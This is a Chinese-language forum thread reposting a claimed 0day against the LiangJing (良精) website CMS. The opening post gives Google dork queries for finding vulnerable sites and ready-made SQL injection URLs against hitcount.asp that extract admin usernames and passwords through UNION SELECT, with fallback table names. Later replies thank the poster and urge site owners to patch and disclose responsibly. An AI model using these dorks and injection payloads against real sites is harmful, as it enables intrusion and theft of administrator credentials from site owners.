良精网站管理系统通杀 0day(转载)
转载转得我都脸红了、、、鄙视看帖不回贴的家伙:$特别注明:看帖可以不回帖,但是严禁在回复中灌水!路过!!之类的就不要发了不好看!
inurl:Search.Asp?Range=Product&Keyword=inurl:ProductBuy.Asp?ProductNo=inurl: (ProductShow.asp?ID=)
爆用户:http://www.xxx.com/hitcount.asp?lx=LiangJingCMS_DownSort&id=1%20and%201=2%20un...
inurl:Search.Asp?Range=Product&Keyword=
inurl:ProductBuy.Asp?ProductNo=
inurl: (ProductShow.asp?ID=)
爆用户:
http://www.xxx.com/hitcount.asp?lx=LiangJingCMS_DownSort&id=1%20and%201=2%20union%20select%20adminname%20from%20LiangjingCMS_admin
如果不行 试试下面的
http://www.xxx.com/hitcount.asp?lx=LiangJing_DownSort&id=1%20and%201=2%20union%20select%20adminname%20from%20Liangjing_admin
爆密码:
http://www.xxx.com/hitcount.asp?lx=LiangJingCMS_DownSort&id=1%20and%201=2%20union%20select%20password%20from%20LiangjingCMS_admin
如果不行 试试下面的
http://www.xxx.com/hitcount.asp?lx=LiangJing_DownSort&id=1%20and%201=2%20union%20select%20password%20from%20Liangjing_admin
希望楼主,将作者名字表明{:soso_e100:} 最好不好转一些过时的漏洞 liangjing的站真多
Re: 良精网站管理系统通杀 0day(转载)
感谢分享这个漏洞信息。不过还是提醒一下,这类未公开的0day最好先通过官方渠道提交,避免被滥用造成不必要的损失。已经部署良精系统的站长建议尽快检查并修复注入点。Re: 良精网站管理系统通杀 0day(转载)
感谢分享,这种通杀漏洞确实影响面大,提醒用良精系统的站长们赶紧自查一下,别等到被黑才后悔。另外想问下,这个漏洞是仅限特定版本还是所有版本都中招?有修复方案的话也麻烦补充一下。Re: 良精网站管理系统通杀 0day(转载)
感谢楼主分享!这个漏洞信息很及时,良精CMS用户确实需要提高警惕。建议管理员立即检查 `hitcount.asp` 等文件的参数过滤,同时加固数据库权限。再次感谢转载,辛苦了!
页:
[1]